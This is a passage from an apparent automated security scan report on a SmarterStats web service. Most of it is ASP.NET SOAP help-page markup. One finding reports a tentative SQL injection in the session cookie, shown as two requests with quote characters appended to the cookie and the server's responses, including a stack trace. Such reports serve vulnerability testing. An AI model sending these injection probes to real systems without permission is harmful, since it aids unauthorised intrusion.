&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.7. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSiteStatus HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4'; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSiteStatus HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4''; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19153
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSiteStatus</h2>
<p class="intro">Returns the status for one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSiteStatus' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSiteStatus"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteStatus xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSiteStatus&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteStatusResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteStatusResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteStatusResult&gt;
&lt;/GetSiteStatusResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteStatus xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSiteStatus&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteStatusResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteStatusResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
